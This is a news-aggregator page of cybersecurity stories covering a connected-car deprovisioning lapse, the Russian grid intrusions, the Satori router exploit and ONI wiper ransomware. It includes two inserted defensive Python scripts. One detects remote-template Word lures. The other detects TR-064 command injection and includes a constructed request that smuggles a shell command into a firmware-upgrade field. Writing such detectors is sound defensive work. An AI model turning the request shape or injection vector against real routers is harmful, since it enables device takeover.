When Your Used Car is a Little Too ‘Mobile’ — Krebs on Security

Source: National Cyber Security – Produced By Gregory Evans

Many modern vehicles let owners use the Internet or a mobile device to control the car’s locks, track location and performance data, and start the engine. But who exactly owns that control is not always clear when these smart cars are sold or leased anew. Here’s the story of one former electric vehicle owner who discovered he could still gain remote, online access to his old automobile years after his lease ended.

Mathew Marulla began leasing a Ford Focus electric vehicle in 2013, but turned the car back in to Ford at the end of his lease in 2016. So Marulla was surprised when he recently received an email from Ford.com stating that the clock in his car was set incorrectly.

Out of curiosity, Marulla decided to check if his old MyFordMobile.com credentials from 2016 still worked. They did, and Marulla was presented with an online dashboard showing the current location of his old ride and its mileage statistics.

The dashboard also allowed him to remotely start the vehicle, as well as lock and unlock its doors.


Mathew Marulla turned in his leased Ford EV to Ford 4 years ago, so he is no longer the legal owner of the car. But he can still remotely track its location and usage, lock and unlock it, and start the engine.

“It was a three-year lease from Ford and I turned it in to Ford four years ago, so Ford definitely knows I am no longer the owner,” Marulla said, noting that the dashboard also included historic records showing where the Focus had been driven in days prior.

“I can track its movements, see where it plugs in,” he said. “Now I know where the current owner likely lives, and if I watch it tomorrow I can probably figure out where he works. I have not been the owner of this vehicle for four years, Ford knows this, yet they took no action whatsoever to remove me as the owner in this application.”

Asked to comment on Marulla’s experience, a spokesperson for Ford said all Ford dealerships are supposed to perform a “master reset” as part of their used car checklist prior to the resale of a vehicle. A master reset (carried out via the vehicle’s SYNC infotainment screen by a customer or dealer) disassociates the vehicle from all current accounts.

“A master reset cleans phone data and removes previous Ford Pass and My Ford Mobile connections,” the company said in a statement released to KrebsOnSecurity. “Once complete, a previous owner will no longer be able to connect to the vehicle when they log in to My Ford Mobile or Ford Pass.”

As Marulla’s experience shows, if you’re in the market for a used car you should probably check whether it’s possible to reset the previous owner’s control and/or information before purchasing it, or at least ask the dealership to help you ensure this gets done once the purchase is made.

And if you’re thinking of selling your car, it’s a good idea to clear your personal data from the vehicle first. As the U.S. Federal Trade Commission advises, some cars have a factory reset option that will return the settings and data to their original state.

“But even after a factory reset, you may still have work to do,” reads an FTC consumer privacy notice from 2018. “For example, your old car may still be connected to subscription services like satellite radio, mobile Wi-Fi hotspots, and data services. You need to cancel these services or have them transferred to your new vehicle.”

By the way, this issue of de-provisioning is something of a sticky wicket, and it potentially extends well beyond vehicles to a number of other “smart” devices that end up being resold or refurbished. This is doubly so for Internet-connected/capable devices whose design may give the previous owner a modicum of access to or control over the device in question regardless of what steps the new owner takes to limit such access (particularly some types of security cameras).




#cyberfraud | #cybercriminals | Twitter Admits User Phone Numbers, Email Data Used For Ads


Email addresses and phone numbers might have been misused

No personal data was shared externally by Twitter

No reports on the number of people impacted have come out yet

In a recently disclosed privacy incident, Twitter confirmed that user data such as email addresses and phone numbers, which users had provided for security purposes, may have been unintentionally used for advertising.

According to a news report, Twitter is currently unable to say with certainty how many people were affected. The US-based company asserted, however, that no personal data was ever shared externally with its partners or any other third parties.

In a statement, Twitter highlighted that the personal data, which were provided for safety or security purposes (for example, two-factor authentication) may have been inadvertently used for advertising purposes, specifically in their Tailored Audiences and Partner Audiences advertising system, which helps in creating relevant remarketing campaigns. 

Explaining how the misuse occurred, Twitter said in a statement: “When an advertiser uploaded their marketing list, it may have matched people on our platform to that list based on the email or phone number that the user had provided for safety and security purposes.”

Twitter acknowledged the problem and said that, as of September 17, it had stopped using phone numbers or email addresses collected for safety or security purposes for advertising.

Although Twitter apologised for this error, it also shared that they have no idea how many people were impacted by this. “We’re very sorry this happened and are taking steps to make sure we don’t make a mistake like this again,” the microblogging site added in the statement. 

Twitter’s average monetisable daily active usage (mDAU) has grown from 122 million in 2018 June quarter to 139 million (29 Mn in the US and 110 Mn from international markets) in 2019 June quarter. Even in the previous quarter, it had a mDAU of 134 million.  

Data Breach On Rise: How Is India Protecting Itself? 

Indian Prime Minister Narendra Modi has called data the new oil and the new gold, and rightly so: stealing and selling it has become very lucrative for hackers. Online food delivery startups Zomato and FreshMenu, fintech startup EarlySalary, McDonald’s India, Oyo, Ashley Madison, Sony and many others have previously suffered data breaches.

Social media sites like Instagram and Facebook have also seen user data misused by advertisers. Recently, an Instagram ad partner was banned for scraping user data without consent, and phone numbers linked to over 419 Mn Facebook accounts were found on unsecured servers.

Whatsapp, which was planning to introduce its payments feature WhatsApp Payments by the end of this year, is also facing difficulties because of the government’s concerns over the messaging platform’s data localisation compliance. In September, National Payments Corporation of India (NPCI) had asked WhatsApp to make changes in its policy to get the final approval for the launch of payments in India. NPCI had asked the instant messaging app to make changes in its data-compliance framework that prohibits storing payment data outside of India.

In May, India was reported to be the second most affected country by cyberattacks between 2016 and 2018. The average cost of a data breach in India has risen 7.9% since 2017, and the average cost per breached record has reached INR 4,552 ($64).

The Reserve Bank of India too recorded a total of 2,059 cases of cyber fraud in 2017-18 as compared to 1,372 cyber fraud cases in 2016-17.


Here Are The #Clever Means #Russia Used To #Hack The #Energy #Industry

Last July, officials from the Federal Bureau of Investigation and the Department of Homeland Security revealed that Russian hackers were behind cyber intrusions into the U.S. energy power grid. The intrusion illustrated the severe threat that hackers pose to our most critical industries – energy, finance, healthcare, manufacturing and transportation.

The DHS and FBI downplayed the danger in a joint statement: “There is no indication of a threat to public safety, as any potential impact appears to be limited to administrative and business networks.”

But that might not be the end of it. Russia may be laying the groundwork for more damaging hacks, on America as well as other nations, using new cyber weapons like CrashOverride and BlackEnergy 3.

Ukraine has already served as the test bed. In December 2015, an attack that used the BlackEnergy 3 malware against distribution utilities in western Ukraine blacked out roughly 225,000 customers; a year later, CrashOverride (also known as Industroyer) was used to cut power in the capital, Kiev. Both tools were developed specifically to disrupt electric power grids.

One might wonder what is Russia’s end game for this kind of attack. To hurt us financially? To show us how vulnerable we are? In preparation for a more sinister attack?

Is it to punish America for anti-Russian policies? The White House expelled 60 Russians from the United States this week, joining western allies in response to Russia’s poisoning of a former Russian spy in Britain with what was a banned chemical weapon.

When DHS and FBI dissected the hackers’ tradecraft, it turned out to be very clever indeed. Mark Orlando, Chief Technology Officer for cyber services at Raytheon, broke down the particulars of why the new world of hacking works so well in America.

One of the attackers’ main strategies is to divide targets into two groups – intended targets which are the energy companies themselves, and staging targets like vendors, suppliers, even trade journals and industry websites.

Instead of going straight to the larger and better-protected targets, like a $60 billion energy company with its own cyber security department, the hackers worked their way into the networks of smaller and less secure companies: the firms that supply the big ones with minor equipment, or the local utilities partnered with them. Local regulators may also have good access.

There is even an Electric Utility Industry Sustainable Supply Chain Alliance that many of the large energy companies use.

When the hackers get into those systems, they use that access to gather intelligence and set traps for the larger company.

This targeting of the supply chain partners is brilliant. The manufacturer of natural gas turbines that supply a gas power plant would have great access to the plant’s systems and management, would probably have password access, and would not be questioned very hard.

‘It’s important to raise awareness,’ says Orlando. ‘These details, if taken by themselves, might not seem that impactful. When presented with the entire story, we can see it was part of a larger, sustained campaign, potentially causing a lot of damage.’

This is a long-term strategy that takes patience – just the kind of thing traditional espionage has perfected over the last century.

America seems to be getting the message. A recent survey from Raytheon and Ponemon showed that two-thirds of cyber security executives and chief information security officers in America, Europe and the Middle East believe cyber extortion, such as ransomware and data breaches, will increase in frequency and payout.

The traps themselves are pretty imaginative. Many are based in social media. No one would suspect a cute kitten video of hiding malware, but it can. And if your co-worker is a kitten nut, they may not hesitate to download that video without thinking that it is a trap.

‘The weakness in cybersecurity is the users themselves, those that are not necessarily computer-savvy,’ says Quinn Mockler, a young cyber security researcher at Columbia Basin College in the Tri-Cities, Washington, near the Hanford Nuclear Reservation. ‘People overall need better awareness of cyber security. Otherwise, we will be open to constant attack.’

In one example discussed by Orlando, the attackers found a harmless-looking photo on one company’s human resources site that contained valuable information – the manufacturer and model of a certain piece of control-systems equipment.

That provided critical information on how the plant runs and set up the next phase of the attack – spear phishing – which is the use of customized, highly deceptive emails designed to deliver malware. Using resumés, curricula vitae, policy documents and other common messages, the hackers made reference to these control systems creating plausible, well-informed emails likely to fool someone into opening a malware-laced attachment.

One was an invitation to a company New Year’s Eve party.

Another common method used to infiltrate is called a watering-hole attack which plants malicious code in a place the targets trust, then waits for them to come pick it up.

In the energy-sector attack, DHS and FBI found that watering holes included trade publications and informational websites that dealt with matters specific to the energy industry. The hackers corrupted those sites and altered them to contain malicious content. The targets saw no reason to suspect anything was wrong when they visited them.

‘It’s a low-complexity, low-effort, high-yield attack,’ Orlando says. ‘With relatively little effort, you can target lots and lots of users.’ The best defense, he says, is for a company to monitor its own networks for signs that a user may have unwittingly stumbled into a watering-hole.

Much of the malware in the energy-sector attack was designed to capture user credentials, the digital identity of someone authorized to use a target network. Credential harvesting targets usernames and passwords as well as password hashes, and is often carried out by tricking someone into entering their details on a fake login page for a familiar site.

The hackers’ spear-phishing emails carried documents that, when opened, made the target’s computer retrieve a resource from a server the hackers either owned themselves or had commandeered. That outbound request leaked the user’s hashed credentials to the attackers, who could then run offline cracking techniques against the hashes to recover the password in plain text.

Requiring multiple modes of authentication to sign in, such as a thumbprint or a security token code, sharply reduces the value of a stolen password. Bear in mind, though, that a convincing fake login page can also relay one-time codes to the attacker in real time; phishing-resistant factors such as hardware security keys bound to the legitimate site close that gap as well.

The hackers also imitated login pages themselves, planting a link that redirected users to a page whose ‘username’ and ‘password’ fields fed credentials straight to them. Orlando notes, ‘If I can come into your environment using authorized credentials, detecting that just became exponentially more difficult.’
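One common way to make a document “retrieve data from a server” on open, as described above, is an external attached-template reference inside a .docx: Word resolves the template location automatically, and if it points at another host the user’s credentials go out with the request. The checker below is an added example written for this page, not code from the article, Raytheon, DHS or FBI. It assumes the lure uses Word’s attachedTemplate relationship in word/_rels/settings.xml.rels, builds constructed sample documents in memory, and flags only targets that would make the machine contact a remote host (http, https, a UNC path, or file:// with a host component), while leaving ordinary local template paths alone.

```python
"""Flag .docx files whose attached-template link points at a remote host.

Added example for this article, not code from Raytheon, DHS or FBI.
Assumption: the lure uses Word's attachedTemplate relationship in
word/_rels/settings.xml.rels (other relationship types can be abused the
same way; add them to REMOTE_REL_TYPES).
"""
import io
import zipfile
import xml.etree.ElementTree as ET
from typing import List, Optional
from urllib.parse import urlsplit
from xml.sax.saxutils import escape

PKG_REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
ATTACHED_TEMPLATE = OFFICE_REL_NS + "/attachedTemplate"
SETTINGS_RELS = "word/_rels/settings.xml.rels"
# Relationship types whose external Target Word resolves automatically on open.
REMOTE_REL_TYPES = {ATTACHED_TEMPLATE}


def is_remote_target(target: str) -> bool:
    """True if opening the target would contact another host (HTTP or SMB)."""
    if target.startswith("\\\\"):            # UNC path: fetched over SMB
        return True
    parts = urlsplit(target)
    if parts.scheme in ("http", "https"):
        return True
    # file:///C:/... stays local; file://host/share/... goes out over SMB
    return parts.scheme == "file" and bool(parts.netloc)


def external_template_targets(docx_bytes: bytes) -> List[str]:
    """All attachedTemplate targets marked External, local or remote."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        if SETTINGS_RELS not in zf.namelist():
            return []
        root = ET.fromstring(zf.read(SETTINGS_RELS))
    return [
        rel.get("Target", "")
        for rel in root.iter("{%s}Relationship" % PKG_REL_NS)
        if rel.get("Type") in REMOTE_REL_TYPES and rel.get("TargetMode") == "External"
    ]


def remote_template_targets(docx_bytes: bytes) -> List[str]:
    """Only the targets that would make Word reach out to another machine."""
    return [t for t in external_template_targets(docx_bytes) if is_remote_target(t)]


def build_sample_docx(template_target: Optional[str]) -> bytes:
    """Constructed sample: a minimal .docx. With a target, settings.xml carries
    an attachedTemplate whose relationship points at that external location."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("word/document.xml",
                    '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
                    '<w:body><w:p><w:r><w:t>Q1 policy update</w:t></w:r></w:p></w:body></w:document>')
        if template_target is not None:
            zf.writestr("word/settings.xml",
                        '<w:settings xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
                        'xmlns:r="%s"><w:attachedTemplate r:id="rId1"/></w:settings>' % OFFICE_REL_NS)
            zf.writestr(SETTINGS_RELS,
                        '<Relationships xmlns="%s"><Relationship Id="rId1" Type="%s" '
                        'Target="%s" TargetMode="External"/></Relationships>'
                        % (PKG_REL_NS, ATTACHED_TEMPLATE, escape(template_target, {'"': "&quot;"})))
    return buf.getvalue()


if __name__ == "__main__":
    # Constructed targets: none, a local template, an SMB share, an HTTP server.
    for target in (None, "file:///C:/Users/hr/Templates/Normal.dotm",
                   "\\\\203.0.113.7\\templates\\policy.dotm", "http://203.0.113.7/policy.dotm"):
        doc = build_sample_docx(target)
        print(repr(target), "->", remote_template_targets(doc) or "no remote template")
```

Run it against a mail gateway’s attachment queue and quarantine anything for which remote_template_targets() is non-empty; the local-path case is deliberately left alone because corporate templates are often wired in exactly that way.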

There are two main lessons from the power-grid hack, Orlando says. First, businesses should know that small hacking attempts like suspicious emails are often part of a larger campaign. Second, they should understand that truly cyber-secure businesses look beyond their own networks, much as epidemiologists track the spread of a new flu virus.

‘Your network isn’t just your network. It’s your network, plus your trusted partners, plus your suppliers,’ he says. ‘If you’re not mitigating risk across the entire cyber ecosystem, you’re potentially missing a very large exposure to your business.’

Since smaller companies are the hackers’ first stop on the way to the bigger targets, Orlando recommends monitoring computer networks for unusual activity, installing security patches regularly, developing a response plan to disclose breaches and limit damage, and communicating up and down the supply chain on cyber security.

Data diodes, air gaps, field programmable gate arrays – all the sophisticated approaches to cyber security that the nuclear and defense industries use – eventually need to be part of everyone’s defense.

But as Orlando summed up, the daunting new reality in modern cyber security is that a company’s cyber defenses are only as strong as the defenses of everyone connected to it.


The #FBI Used #Classified #Hacking #Tools in Ordinary #Criminal #Investigations

The FBI’s Remote Operations Unit (ROU), tasked with hacking into computers and phones, is one of the Bureau’s most elusive departments. But a recent report from the Office of the Inspector General (OIG) for the Department of Justice has now publicly acknowledged the unit’s existence seemingly for the first time. The report also revealed that the ROU has used classified hacking tools—techniques typically reserved for intelligence purposes—in ordinary criminal investigations, possibly denying defendants the chance to scrutinize evidence, as well as destabilizing prosecutors’ cases against suspects.

“Using classified tools in criminal cases is risky for all sides,” Ahmed Ghappour, associate professor of law at Boston University School of Law, and who has researched law enforcement hacking extensively, told Motherboard in a Twitter message.

The ROU is part of the FBI’s Operational Technology Division (OTD), which handles the Bureau’s more technical surveillance methods. The OIG’s report says ROU “provides computer network exploitation capabilities” and has “engineers and vendors who attempt to develop techniques that can exploit mobile devices.” A previous Wall Street Journal report said the FBI can use malware to remotely activate microphones on Android devices.

In 2013, then American Civil Liberties Union (ACLU) principal technologist Chris Soghoian uncovered ROU’s existence by piecing together LinkedIn profiles and sections of documents released through the Freedom of Information Act. Soghoian found that an Eric Chuang heads the ROU, and it appears Chuang is still leading the unit now—the OIG report mentions the current head became chief in 2010.

While most of the OIG’s new report focuses on how the FBI did not fully explore its technical options for accessing the iPhone of one of the San Bernardino terrorists in 2016, several sections shine more light on the ROU, and how they are using their hacking tools. One mentions the ROU chief, based on long standing policy, sees a “line in the sand” against using national security tools in criminal cases—this was why the ROU initially did not get involved at all with finding a solution to unlocking the San Bernardino iPhone. Indeed, it’s important to remember that as well as a law enforcement agency, the FBI also acts as an intelligence body, gathering information that may be used to protect the country, rather than bring formal charges against suspects.

But that line can be crossed with approval of the Deputy Attorney General to use the more sensitive techniques in ordinary investigations, the report adds.

“The ROU Chief was aware of two instances in which the FBI invoked these procedures,” a footnote in the report reads. In other words, although it seemingly only happened twice, the FBI has asked for permission to use classified hacking techniques in a criminal case.

It’s not clear which two cases the ROU Chief is referring to. However, the FBI previously deployed a Tor Browser exploit to over 8,000 computers around the world, including some in China, Russia, and Iran, based on one, legally contentious warrant. At the time of the operation in February 2015, the tool was unclassified. But as Motherboard found using court records, the following year the FBI moved to classify the exploit itself for reasons of national security, despite the case being a criminal child pornography investigation.

Motherboard’s recent investigation into the exploit industry found that an Australia-based company called Azimuth Security, along with its partner Linchpin Labs, has provided exploits to the FBI, including one for breaking through the Tor Browser.

Using classified tools in a criminal investigation may pose issues for both prosecutors and defendants. If the FBI used a classified technique to identify a suspect, does the suspect find out, and have a chance to question the legality of the search used against them?

“When hacking tools are classified, reliance on them in regular criminal investigations is likely to severely undermine a defendant’s constitutional rights by complicating discovery into and confrontation of their details,” Brett Kaufman, a staff attorney at the ACLU, told Motherboard in an email. “If hacking tools are used at all, the government should seek a warrant to employ them, and it must fully disclose to a judge sufficient information, in clear language, about how the tools work and what they will do,” he added.

And on the flip side, if the FBI uses a classified and sensitive tool in an ordinary case and has to reveal information about it in court, the underlying vulnerability may then be fixed by the affected vendor, such as, say, Apple. Some may see that as a positive, but the FBI might have to drop its charges against a criminal as well.

“It’s also a risk for the government, who may be ordered to disclose classified information to the defense to satisfy due process, or face dismissal of the case,” Ghappour said.

With the mentioned Tor Browser attack, a judge ordered the FBI to give defense counsel the code of the exploit; the FBI refused, meaning the evidence the related malware obtained was thrown out altogether.

A spokesperson for the FBI declined to comment on the ROU’s cross-over into criminal cases, and instead pointed to page 16 of the report, which reads, in part, that “FBI/OTD has realigned mission areas for several Units in preparation for a larger re-organization.”


How Can #Blockchain Be #Used to Aid #Cybersecurity?

With the rapid advancement of internet-based technologies, cybersecurity is a constant cloud looming on the horizon. As the technology evolves, so too, do the cybercriminals. Their constant efforts to steal valuable data and disrupt business through DDoS attacks are increasingly sophisticated.

Holding companies hostage and monetizing data through ransomware techniques is sadly par for the course. In fact, it’s estimated that cybercrime costs the global economy some $450 billion a year. With IT professionals scrambling to stay one step ahead of the hackers, how can blockchain be used to aid cybersecurity?

NO SINGLE POINT OF FAILURE

The decentralized nature of the blockchain means that there is no single point of failure and no one central database waiting to be hacked. The ledger is replicated across many nodes, and each block is cryptographically linked to the one before it, so altering a record means rewriting the chain across most of the network. That removes a class of risk that centralized databases carry, but it does not make the system unhackable: the private keys that control accounts, the nodes and applications at the edges, and any code that runs on the chain remain attackable.

REMOVING HUMAN ERROR

The weakest link in the current model is the password, which can be guessed, cracked or phished. Blockchain-based identity schemes aim to take that human error out of authentication: instead of a password, each device is issued its own (SSL/TLS) certificate and proves possession of the matching private key when it authenticates.


Park Hill #parent says #school #laptop was used for #inappropriate #relationship with #student


A metro school district is making big changes in cybersecurity. It comes after a parent says things got so bad for her daughter, she was forced to pull her child out of school and move her out of state.

41 Action News sat down with a concerned mother who wished to remain anonymous. Her daughter once attended the Park Hill School District.

She said the problems began shortly after her daughter was issued a laptop by the district. She said her daughter then set up a Facebook account with her school email address, on her school laptop.

“This Facebook account was used by her boyfriend to help groom her for an inappropriate, sexual relationship,” said the mother. “Over a 6-week period, there’s 650 printable pages of him talking to her and trying to teach her about bondage relationships.”

The mother said her daughter’s personality changed abruptly and feels the inappropriate relationship would’ve been caught sooner if district leaders put more safeguards on those laptops.

“She got physically violent with me one time. If they’re searching for guns, violence, porn, then someone should be alerted to this. Whether it’s inside the school or not.”


Hackers #Release #Huawei #Router #Exploit Code Used in #IoT #Botnet


Today’s topics include the Huawei router exploit code used in the Satori IoT botnet going public; a rise in GPU sales in 2017; and LinkedIn expanding its job seeker toolkit ahead of the new year.

Researchers at NewSky Security reported Dec. 28 that code from the Satori internet of things botnet that exploits a Huawei router vulnerability has been publicly posted on the internet. The vulnerability, which internet service providers had shut down earlier this month, was discovered by security firm Check Point, which reported the issue to Huawei on Nov. 27.

“An authenticated attacker could send malicious packets to port 37215 to launch attacks. Successful exploit could lead to the remote execution of arbitrary code,” Huawei said.

Check Point reported that the root cause of the flaw lies in Huawei’s implementation of the Universal Plug and Play protocol via the TR-064 technical report standard. Huawei’s implementation allowed remote attackers to inject arbitrary commands, which the attackers used to build the Satori botnet.

Maya Horowitz, Threat Intelligence Group Manager at Check Point, said “[Users should] change the default password on their router,” and recommends that end users running Huawei routers behind a firewall or Intrusion Prevention System should configure those devices to block the exploit’s traffic.
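Blocking “the exploit’s traffic”, as recommended above, needs something that can recognise it. The following is an added example written for this page, not code from Check Point, NewSky Security or Huawei: a small inspector that classifies an HTTP request heading for TCP/37215 and flags a DeviceUpgrade SOAP call whose URL arguments carry shell metacharacters, which is what turns a firmware-upgrade request into a command injection. The endpoint path /ctrlt/DeviceUpgrade_1 and the NewStatusURL / NewDownloadURL argument names are assumed from the published Satori payload (adjust them if your captures differ), and both sample requests are constructed, not captured traffic.

```python
"""Spot command-injection attempts against the TR-064 DeviceUpgrade endpoint
on TCP/37215, the vector the Satori botnet used against Huawei home routers.

Added example for this article, not Check Point's, NewSky's or Huawei's code.
Assumptions: the endpoint path and the NewStatusURL / NewDownloadURL SOAP
arguments are those seen in the public Satori payload; the sample requests
below are constructed, not captures.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

TR064_PORT = 37215
UPGRADE_PATH = "/ctrlt/DeviceUpgrade_1"         # assumption: path used by the public payload
URL_ARGS = ("NewStatusURL", "NewDownloadURL")  # assumption: the injected arguments
# Shell metacharacters that never belong in a firmware URL argument.
INJECTION = re.compile(r"\$\(|`|;|\|\||&&|\|")


@dataclass
class Verdict:
    suspicious: bool
    reason: str
    injected_args: List[str] = field(default_factory=list)


def parse_http_request(raw: bytes) -> Tuple[str, str, Dict[str, str], str]:
    """Split a raw HTTP/1.x request into (method, path, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body.decode("latin-1", errors="replace")


def inspect_request(dst_port: int, raw: bytes) -> Verdict:
    """Classify one reassembled TCP payload addressed to a router."""
    if dst_port != TR064_PORT:
        return Verdict(False, "not the TR-064 port")
    method, path, headers, body = parse_http_request(raw)
    action = headers.get("soapaction", "")
    if method != "POST" or not (path.startswith(UPGRADE_PATH) or action.endswith('#Upgrade"')):
        return Verdict(False, "not a DeviceUpgrade call")
    injected = []
    for arg in URL_ARGS:
        m = re.search(r"<%s>(.*?)</%s>" % (re.escape(arg), re.escape(arg)), body, re.S)
        if m and INJECTION.search(m.group(1)):
            injected.append(arg)
    if injected:
        return Verdict(True, "shell metacharacters in DeviceUpgrade URL argument", injected)
    # Even a clean call is worth logging when it arrives from the WAN side:
    # this port should never be reachable from the Internet at all.
    return Verdict(False, "DeviceUpgrade call without injection markers")


def _soap_upgrade(status_url: str, download_url: str) -> bytes:
    """Constructed request in the shape of a TR-064 Upgrade call."""
    body = (
        '<?xml version="1.0"?>'
        '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body>'
        '<u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1">'
        "<NewStatusURL>%s</NewStatusURL><NewDownloadURL>%s</NewDownloadURL>"
        "</u:Upgrade></s:Body></s:Envelope>" % (status_url, download_url)
    ).encode()
    head = (
        "POST %s HTTP/1.1\r\nHost: 192.0.2.1:37215\r\nContent-Type: text/xml\r\n"
        'SOAPAction: "urn:schemas-upnp-org:service:WANPPPConnection:1#Upgrade"\r\n'
        "Content-Length: %d\r\n\r\n" % (UPGRADE_PATH, len(body))
    ).encode()
    return head + body


# Constructed: an injection marker smuggled in NewStatusURL, the way Satori did.
SAMPLE_ATTACK = _soap_upgrade("$(echo probe)", "http://192.0.2.99/fw.bin")
# Constructed: a well-formed upgrade request with ordinary URLs.
SAMPLE_BENIGN = _soap_upgrade("http://192.0.2.99/status", "http://192.0.2.99/fw.bin")

if __name__ == "__main__":
    for name, raw in (("attack", SAMPLE_ATTACK), ("benign", SAMPLE_BENIGN)):
        print(name, "->", inspect_request(TR064_PORT, raw))
```

Feed it reassembled TCP payloads from a capture tool or an IDS hook; a positive verdict is the signature to drop at the firewall, and, as the second branch notes, any request at all reaching 37215 from the WAN is itself an exposure to fix.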

Jon Peddie Research released Dec. 29 its annual review of graphics processing unit developments, and the results indicate good things for the year past and for 2018. Despite an overall slowdown in worldwide sales of PCs, PC-based GPU sales have been increasing at the same rate as mobile devices.

Sales in the console market have also increased over the year, where integrated graphics are in every console. The IT business has seen a few new GPUs showing the path for future developments and subsequent applications, and 2017 was a solid year for GPU development driven by games, eSports, artificial intelligence, cryptocurrency mining and simulations.

Autonomous vehicles started to become a reality, as did augmented reality. Mobile GPUs, exemplified by Qualcomm, ARM and Imagination Technologies, introduced some advanced devices with long battery life and screens at or approaching 4K.

Jon Peddie Research said, “2018 is going to be an even more amazing year [for GPUs], with AI being the leading applications that will permeate every sector of our lives.”

LinkedIn, Microsoft’s business-focused social network, has new features to help members land a new job or build the skills required for a career change.

This is just in time for the many people, particularly IT workers, who are considering switching jobs in 2018, according to Spiceworks’ recent 2018 IT Career Outlook survey. Nearly a third of IT workers in North America and Europe plan to look for a new job in 2018 with higher salaries and opportunities to improve their skills sets.

LinkedIn is now issuing monthly notifications alerting users to trending skills among folks with the same job title. If members already possess a given skill, they can add it to their profiles, improving the chances that interested employers will come calling. If they lack the expertise, users can click on a skill to see corresponding LinkedIn Learning courses, along with the organizations that are hiring people with that skill.


This #destructive #wiper #ransomware was used to #hide a #stealthy #hacking #campaign


Ransomware is being used to hide an elaborate, targeted hacking campaign which went undetected for months before the attackers pulled the plug and encrypted hundreds of machines at once in an effort to remove stolen data while also covering their tracks.

The campaign targeted several Japanese organisations in intrusions that lasted from three to nine months before a ransomware attack, functioning as a wiper on the compromised machines, was triggered to hide the operation.

Forensic investigation of the infected machines by researchers at Cybereason has led them to the conclusion that the attacker made the attempt to wipe evidence of the operation and destroy any traces of attack.

The ransomware, ONI, takes its name from the .oni extension it appends to encrypted files and from the email address in the ransom note; that address translates to “Night of the Devil”, the name the researchers have given to the operation. They note that ONI shares much of its code with GlobeImposter ransomware.

Attacks using ONI ransomware have been carried out against Japanese targets for some time, but the investigation into the latest wave of attacks uncovered a new variant, MBR-ONI, a form of the ransomware which comes equipped with bootkit features.

The new bootkit ransomware is based on DiskCryptor, a legitimate disk encryption tool, the code of which has also been found in Bad Rabbit ransomware.

While MBR-ONI bootkit ransomware was used against a controlled set of targets, such as Active Directory server and other critical assets, ONI was used against the rest of the endpoints in an infected network.

The ONI-based attacks all begin in the same way, with spear-phishing emails distributing malicious Office documents which drops the Ammyy Admin remote access tool.

Once inside the system, attackers map the internal networks, harvesting credentials and moving laterally through the system – researchers suspect that the leaked NSA SMB exploit EternalBlue plays a role in enabling the attackers to spread through the network.

Ultimately, the attackers compromise critical assets, including the domain controller, to gain full control of the network and the ability to exfiltrate any data they deem important.

Once the attackers were done with an infected network, the ONI and MBR-ONI ransomware was run.

While ONI does provide a ransom note and the prospect of recovering encrypted data, the researchers believe MBR-ONI was never designed to yield a decryption key. It acts instead as a wiper to cover the attackers’ footprints and conceal the true goals of the attack: espionage and the exfiltration of data over a period of months.

During investigations of targeted organisations, it was found that some had been compromised since December 2016, indicating long-term planning and sophistication on behalf of the attackers.

“While ONI and the newly discovered MBR-ONI exhibit all the characteristics of ransomware, our analysis strongly suggests that they might have actually been used as wipers to cover an elaborate scheme,” said Assaf Dahan, director of advanced security services at Cybereason.

“The use of ransomware and/or wipers in targeted attacks is not a very common practice, but it is on the rise. We believe ‘The Night of the Devil’ attack is part of a concerning global trend in which threat actors use ransomware/wipers in targeted attacks,” he added.

Researchers haven’t been able to conclusively determine who is behind the campaign; Russian-language strings in the code could be a clue or a diversion in equal measure.

“The question of attribution is a tricky one. The Russian language traces found in the binary files could suggest that there is a Russian threat actor behind the attack. That being said, this kind of data can also be easily manipulated by the attackers to throw researchers off track,” Dahan told ZDNet.

The post This #destructive #wiper #ransomware was used to #hide a #stealthy #hacking #campaign appeared first on National Cyber Security Ventures.

View full post on National Cyber Security Ventures

Today’s bank heists aren’t what they used to be with the battle now fought out in cyberspace

Source: National Cyber Security – Produced By Gregory Evans


Bank heists aren’t what they used to be. With sophisticated underground networks of hackers able to remotely swipe millions from financial institutions within seconds, many now look back wistfully on the days when a bank robbery involved a getaway chase, fat wads of cash and a bandit eye mask.

“Cyber is now the tool of choice for significant financial crime: it is easier to dispose of the stolen assets and the crime is easier to get away with,” says Andrew Moir, head of global cyber security at law firm Herbert Smith Freehills. “Compare the $81m (£61m) Bank of Bangladesh cyber heist [stolen from the bank’s account at the US Federal Reserve last year] to the £25m Hatton Garden jewel raid.”

The City of London is eager to show it is a leader in the fight against computer crime, particularly as Brexit rumbles in the background and threatens London’s status as Europe’s financial centre.

Dominic Raab, the justice minister, said last month that a decision to open a new court in the City to focus on cyber crime was a “terrific advert for post-Brexit Britain” while Catherine McGuinness, the City’s top official, is heading to Israel to meet cyber security experts and academics, with the aim of mirroring Tel Aviv’s success in attracting start-ups.

“[It’s] the first time we’ve made a trip like this, there is a fresh focus on cyber from us as an organisation,” Ms McGuinness made clear, adding that she will be looking at potential partnerships with specialists in Israel. She uses the new court, which is being funded by the City of London Corporation and will be based in the Square Mile, as an example of how the UK is keeping up with financial crime in the 21st century.

The UK was the target of one in eight cyber attacks in Europe between January and September last year, according to research from cyber security firm FireEye. No wonder then that the City is ploughing money into the issue – all too aware that finance is among the most targeted industries. The UK’s National Cyber Security Centre has dealt with more than 600 “significant” cyber attacks since it was opened just a year ago by the Government Communications Headquarters (GCHQ), and today is hosting a summit for EU member states to share what it has learnt.

